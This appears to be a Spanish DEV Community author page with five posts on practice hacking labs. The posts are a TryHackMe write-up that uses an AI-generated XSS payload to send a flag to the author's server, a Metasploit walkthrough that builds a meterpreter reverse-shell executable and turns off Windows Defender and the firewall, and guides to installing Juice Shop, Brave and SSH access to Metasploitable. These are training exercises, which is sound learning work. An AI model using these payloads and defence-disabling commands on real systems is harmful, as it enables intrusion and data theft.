DEV Community: mister_keto

Resolucion maquina The Sticker Shop (TryHackMe)

mister_keto — Sat, 14 Mar 2026 11:03:50 +0000

En lo que iba a parecer una maquina sencillita se complica un poco a la larga pero acaba saliendo.
En el objetivo que recibimos nos dan una ip y un puerto que funciona como dominio que da acceso a una flag.txt que opera del lado del servidor.
Accedemos a la ip descargando el archivo vpn de la web y arrancando el tunel.

OBJETIVO: http://10.130.136.96:8080/flag.txt
HOST (tun0): 192.168.1.123

En la web lo único que encuentro son dos apartado,
"Home" y "Feedback", tras el reconocimiento una de ellas será la base de la resolución.

Tiramos de NMAP a puertos y solo encuentro el 22 y el 8080 con proxy.Hago otro nmap a servicios pero tampoco encuentro nada interesante.

Tras mirar robots.txt y sitemap.xml no conseguimos nada.
Siguiente objetivo ir al apartado Feedback de la web que es lo único que parece que se le puede inyectar algún script.

Me toca tirar de IA porque los scripts de injeccion XSS que utilizo no tienen ningún exito.
Uso el siguiente prompt para que me genere un script de inyección HTML.

¿Cómo puedo leer el archivo /flag.txt mediante una inyección HTML, de modo que la entrada del administrador se procese y ejecute en el lado del administrador, utilizando GET en lugar de POST y añadiendo los datos de la respuesta a la propia URL? El sitio web es http://10.130.136.96:8080/flag.txt y mi servidor tiene la dirección IP 192.168.129.123?

La idea es que ese script inyecte del lado del administrador por que tiene el proxy.

Ahora la idea es ejecutar en mi terminal del host un servidor python, antes del payload, para poder recibir la respuesta del script cuando capture la flag.txt

Ejecuto por el puerto 8085 al ser el puerto que usaré para la redirección de la flag.txt

Pego el script en el cuadro de dialogo de Feedback.

<script>
fetch('/flag.txt')
  .then(r => r.text())
  .then(t => {
      window.location.href = 'http://192.168.129.123:8085/?' + encodeURIComponent(t);
  });
</script>

Una vez que lanzo el script en el Feedback, recibiré en mi servidor la respuesta automaticamente con un 200 ok.

Copio el codigo y lo descodifico en URL a traves de CyberChef.

https://toolbox.itsec.tamu.edu/#recipe=URL_Decode()&input=VEhNJTdCODM3ODlhNjkwNzRmNjM2ZjY0YTM4ODc5Y2ZjYWJlOGI2MjMwNWVlNiU3RA

Le paso el codigo y me da la flag sin codificar.

THM{83789a69074f636f64a38879cfcabe8b62305ee6}

Instalar JUICE SHOP (owasp) en Linux

mister_keto — Sat, 29 Nov 2025 02:02:43 +0000

En mi caso voy a instalarlo en parrot y hacerlo funcionar de manera sencilla con tres simples pasos.
OWASP Juice Shop es un entorno de práctica de ciberseguridad. Piensa en él como un “juego de hacking legal”:

Es una aplicación web falsa, parecida a una tienda online (de jugos, de ahí el nombre).

Tiene fallos de seguridad intencionales de todo tipo:

SQL Injection
Cross-Site Scripting (XSS)
Cross-Site Request Forgery (CSRF)
Autenticación rota
Exposición de datos sensibles
Y muchos más

En mi caso voy a crear un contenedor en el cual estará instalada la pagina web de Owasp Juiceshop y a la cual podremos atacar sin ningún temor al estar instalada en mi propio equipo (localhost).

Para instalar el Docker o Contenedor en linux habremos de ser administradores:

sudo su

seguimos instalando el docker

apt install docker.io

nos aseguramos que funciona

docker --version
docker ps

e instalamos juiceshop y le damos el puerto 3000, que será el puerto por el que accederemos a la web para verla.

docker run -d --name juice-shop -p 3000:3000 bkimminich/juice-shop

-d → ejecuta en segundo plano
--name juice-shop → nombre del contenedor
-p 3000:3000 → expone el puerto 3000 para acceder desde mi navegador

accedemos vía navegador web. En mi caso Firefox y vemos la famosa web de practicas. Ahí verás la tienda simulada, lista para aprender y practicar conceptos de seguridad de manera ética.

Ale, a trabajar.

Instalación de Brave en Parrot/Kali/Linux

mister_keto — Mon, 27 Oct 2025 21:54:37 +0000

Es relativamente sencillo instalar Brave en Linux siguiendo estos pasos todo ello en la consola del SO.

Actualizamos nuestro sistema operativo.

sudo apt update && sudo apt upgrade -y

Instalamos los paquetes necesarios para que funcione.

Brave requiere curl, apt-transport-https y gnupg para manejar los repositorios:

sudo apt install apt-transport-https curl gnupg -y

Agrega la clave GPG oficial de Brave

Una clave GPG (del inglés GNU Privacy Guard) es una herramienta criptográfica que se utiliza para firmar, cifrar y verificar información o comunicaciones digitales, garantizando la autenticidad, integridad y confidencialidad de los datos.
Sirve para proteger información mediante criptografía de clave pública y privada.

¿Cómo funciona una clave GPG?

Una clave GPG está compuesta por dos partes:

Clave privada → solo la posee el dueño.

Sirve para firmar o descifrar mensajes.
Debe mantenerse en secreto.

Clave pública → puede compartirse libremente.

Sirve para que otros verifiquen tus firmas o te envíen mensajes cifrados.

añadimos la clave GPG

sudo curl -fsSLo /usr/share/keyrings/brave-browser-archive-keyring.gpg https://brave-browser-apt-release.s3.brave.com/brave-browser-archive-keyring.gpg

Añadimos el repositorio de Brave

echo "deb [signed-by=/usr/share/keyrings/brave-browser-archive-keyring.gpg] https://brave-browser-apt-release.s3.brave.com/ stable main" | sudo tee /etc/apt/sources.list.d/brave-browser-release.list

Instalamos Brave

sudo apt update
sudo apt install brave-browser -y

Ejecutamos Brave de forma gráfica

brave-browser

Controlar maquina windows a traves de ejecutable .exe desde linux

mister_keto — Tue, 16 Sep 2025 16:13:42 +0000

SERVIDOR SAMBA
Lo primero que necesitamos para hacer esta práctica es crear un servidor Samba. En este servidor que creamos en Parrot, que es un linux basado en Debian, compartiremos el archivo ".exe" que acabaremos metiendo en Windows.(ejecutable malicioso)

sudo apt install samba -y

Edito su archivo de configuración .conf y le digo en que carpeta quiero que comparta los archivos el servidor samba. En mi caso usaré la carpeta Desktop que es donde generaré el archivo malicioso. Lo podemos hacer donde queramos pero hemos de saber situarla para no tener problemas luego buscando el archivo.

Hago una copia de seguridad del archivo para respaldarlo antes de editarlo

sudo cp /etc/samba/smb.conf /etc/samba/smb_original.conf

Y edito el archivo de configuración de Samba.

sudo nano /etc/samba/smb.conf

Como comparto la carpeta Desktop dentro de la home del usuario misterk.
Añado las siguientes lineas al archivo de configuración y edito la localización de la carpeta que compartiré con samba.

Como valid user pongo al usuario con el que accederé a la carpeta desde windows. En mi caso "misterk".

[Compartido]
   path = /home/misterk/Desktop
   available = yes
   valid users = misterk
   read only = no
   browsable = yes
   public = yes
   writable = yes

Guardo el archivo y lo cierro.

Añado una contraseña al usuario misterk.

sudo smbpasswd -a misterk

Recargo el servidor samba y compruebo que está en ejecución.

sudo systemctl reload smbd
sudo systemctl start smbd
sudo systemctl status smbd

Miro las ip's de ambas maquinas con el comando ip ad en la terminal de linux y con ipconfig en la terminal powershell o cmd de Windows y
pruebo que ambas maquinas se vean a traves del comando ping, en ambas maquinas:

EN LINUX
Lanzo comando en la terminal.

ip ad

Nos dará la ip de nuestra máquina.

EN WINDOWS
Lanzo este comando en PowerShell o en el CMD

ipconfig

Averiguamos las direcciones IP de nuestras dos máquinas. La maquina linux y la objetivo (windows) y hacemos ping entre ellas para corroborar que hay comunicación.

kali: 192.168.1.140
windows 10: 192.168.1.156

ping 192.168.1.156

Hacer el ping nos dirá los paquetes que han llegado a su destino y si han llegado todos lo paquetes enviados. Hacemos lo mismo desde windows apuntando a la dirección de Kali "192.168.1.140".

POSTGRESQL

Ejecutamos el servicio postgresql, para no perder los datos de msfconsole.

Cuando activo esta base de datos (postgresql), puedo guardar:

Resultados de escaneos (ejemplo: nmap integrado en Metasploit).
Hosts descubiertos (direcciones IP, puertos abiertos, sistemas operativos).
Servicios detectados en cada máquina.
Credenciales (usuarios/contraseñas) obtenidas en ataques.
Sesiones y exploits usados.

En lugar de perder la info al cerrar msfconsole, la base de datos la conserva.

Arrancamos el servicio antes de meternos a la msfconsole como root para evitar que nos pida contraseñas.

sudo service postgresql start

MSFCONSOLE

msfconsole es la interfaz de línea de comandos principal de **Metasploit **Framework, una herramienta muy poderosa para pruebas de penetración, desarrollo de exploits y análisis de seguridad. Como ya viene preinstalada en Parrot OS, no hace falta que lo instalemos.

Lo arrancamos directamente.

msfconsole

Arrancará la consola de msfconsole y ejecutamos un db_status para corroborar que ha conectado con postgresql

db_status

Si todo está bien nos contestará así.

[*] Connected to msf. Connection type: postgresql.
[msf](Jobs:0 Agents:0) >>

Nos colocamos en la carpeta que vamos a compartir con Samba dentro de la consola de msfconsole para crear el ejecutable (payload). En este caso, para que no haya dudas se llamará virusaco.exe, y lo crearemos en Desktop.

cd /home/misterk/Desktop

Genero el payload que enviaré a Windows.

IMPORTANTE: La ip que meto en el siguiente comando es la de kali, nuestra maquina atacante.

msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST="192.168.1.140" LPORT=4444 -o virusaco.exe

Si el puerto nos dá problemas, cambiamos de puerto y listo.
Nos dará un dialogo como el siguiente la consola

[*] exec: msfvenom -p windows/meterpreter/reverse_tcp --platform windows --arch x86 -f exe LHOST="192.168.1.140" LPORT=4444 -o virusaco.exe

Overriding user environment variable 'OPENSSL_CONF' to enable legacy functions.
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: virusaco.exe

Ejecutamos las siguientes lineas una a una para configurar el listener, o archivo que estará a la escucha del payload que se ejecutará en Windows.
A cada linea que se genera en la terminal añado la mia.

use multi/handler

multi/handler en Metasploit se utiliza para configurar un "manejador" que espera conexiones entrantes desde una máquina comprometida. Esencialmente, es como preparar un punto de encuentro para recibir una conexión remota desde un exploit exitoso.

¿Para qué sirve?
Recibir conexiones: Cuando ejecutas un exploit que abre una puerta trasera (por ejemplo, un payload como Meterpreter), el manejador espera a que la máquina objetivo se conecte a ti.
Interactuar con la víctima: Una vez establecida la conexión, puedes controlar la máquina remota, ejecutar comandos, extraer datos, etc.

Ahora vamos con el reverse_tcp:

set payload generic/shell_reverse_tcp

set payload windows/meterpreter/reverse_tcp

Este comando básicamente hace lo siguiente:

set payload generic/shell_reverse_tcp

Configuro el payload para crear una shell inversa genérica. Esto significa que, si la explotación tiene éxito, se establecerá una conexión inversa desde el objetivo hacia tu máquina, permitiéndote ejecutar comandos en el sistema comprometido.

set payload windows/meterpreter/reverse_tcp

Cambio el payload a Meterpreter, que es una carga útil más avanzada y flexible. Meterpreter **proporciona un entorno interactivo con muchas funcionalidades adicionales, como la manipulación de archivos, la extracción de credenciales y más. Este payload también establece una conexión inversa TCP, pero con las ventajas adicionales de **Meterpreter.

Configuro el localhost

set lhost 192.168.1.156

El puerto por el que mandará la escucha:

set lport 4444

Y ejecuto el programa del listener y la terminal se queda a la escucha de que se ejecute.

exploit

[*] Started reverse TCP handler on 192.168.1.156:4444 
[*] Sending stage (177734 bytes) to 192.168.1.156
/usr/share/metasploit-framework/vendor/bundle/ruby/3.1.0/gems/recog-3.1.17/lib/recog/fingerprint/regexp_factory.rb:34: warning: nested repeat operator '+' and '?' was replaced with '*' in regular expression

Desactivo Windows Defender y el firewall de windows para poder hacer la práctica sin problemas de eliminación del programa ejecutable.

Para no andar con el lio que supone ir haciendo uno por uno el desactivar Windows Defender y su Firewall. Lo desactivo a traves del powershell en modo Administrador (boton derecho sobre su ejecutable) y ejecutando las siguientes lineas.

Set-MpPreference -DisableRealtimeMonitoring $true
Set-MpPreference -DisableBehaviorMonitoring $true
Set-MpPreference -DisableIOAVProtection $true
Set-MpPreference -DisableScriptScanning $true
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False

NOTA IMPORTANTE:

Volver a que Windows Defender vuelva a funcionar junto al Firewall, lo haremos con las siguientes lineas o simplemente arrancando de cero windows lo deja como estaba. Pero ahora mismo no habremos de hacerlo a fin de no tener problemas descargando el ejecutable desde Samba.

Lo haremos al final del tutorial. NOTA AL FINAL DEL LABORATORIO.

Abro el explorardor de archivos y escribo en la barra de direcciones
"\\192.168.1.140\misterk\Desktop" y me abre la carpeta compartida a traves del servidor samba en kali linux.

Descargo el archivo "virusaco.exe" a Windows y lo ejecuto.

Y me sale lo siguiente en mi terminal de kali.

[*] Meterpreter session 1 opened (192.168.1.140:4444 -> 192.168.1.156:65111) at 2025-08-30 03:06:22 +0200

Ya puedo ejecutar comandos en Windows a traves de mi terminal de Linux.

(Meterpreter 1)(C:\Users\misterk\Desktop) > ls

Listing: C:\Users\misterk\Desktop
=================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100666/rw-rw-rw-  2354   fil   2025-08-29 16:37:43 +0200  Microsoft Edge.lnk
100666/rw-rw-rw-  282    fil   2025-08-29 16:37:42 +0200  desktop.ini
100777/rwxrwxrwx  73802  fil   2025-08-30 03:03:49 +0200  virusaco.exe

(Meterpreter 1)(C:\Users\misterk\Desktop) >

Y ya estoy dentro de windows.

Para activar la seguridad en windows reiniciamos el equipo o ejecutamos esto en modo administrador desde la Powershell.

Set-MpPreference -DisableRealtimeMonitoring $false
Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled True

Conectar via ssh con Metasploitable 2

mister_keto — Fri, 29 Aug 2025 00:34:05 +0000

Aunque parece sencillo conectar vía SSH con este magnífico laboratorio de sabiduría, no es fácil. Tras mucha pelea he conseguido la manera de conectarme y al mismo tiempo crear un alias en mi terminal de linux para acceder de forma más rápida a ese host.

Metasploitable2 usa un servidor SSH muy viejo, que solo ofrece algoritmos obsoletos (ssh-rsa con SHA-1 y ssh-dss). Las versiones modernas de OpenSSH (las que tienes en Kali, Ubuntu, Parrot, etc.) los deshabilitan por defecto, por eso falla.

sí intentamos un:

ssh msfadmin@192.168.1.155

nos tira el siguiente error

Unable to negotiate with 192.168.1.155 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

Con el siguiente comando forzamos a tu cliente SSH a aceptar claves débiles antiguas (ssh-rsa) que el servidor Metasploitable2 todavía usa, para que la conexión no falle por “no matching host key type”.

ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa msfadmin@192.168.1.155

En pocas palabras, le decimos lo siguiente:

Oye SSH, ignora las restricciones modernas y conéctate a este servidor antiguo usando claves ssh-rsa.

CREAR UN ALIAS EN NUESTRO LINUX PARA CONECTAR MAS FACILMENTE

Ahora viene la segunda parte del ejercicio crear un alias en nuestro archivo de configuración de ssh. Para que las próximas veces solo tengamos que poner la contraseña para conectarnos a metasploitable.

creamos el archivo de configuración de ssh en la siguiente ruta si no existiera

sudo nano ~/.ssh/config

Si no estamos como Super usuario o sudo le damos la contraseña y dentro del archivo pegamos lo siguiente:

Host metasploitable
    HostName 192.168.1.155   # IP actual de la VM
    User msfadmin
    HostKeyAlgorithms +ssh-rsa
    PubkeyAcceptedAlgorithms +ssh-rsa

con esto conseguimos evitarnos volver a escribir todos los comandos anteriores y con un simple...

ssh metasploitable

entraremos vía ssh a tan magnifico laboratorio a trastear.